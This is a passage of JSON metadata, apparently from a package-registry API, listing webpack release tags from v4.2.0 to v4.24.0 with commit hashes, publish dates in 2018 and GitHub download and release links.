https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21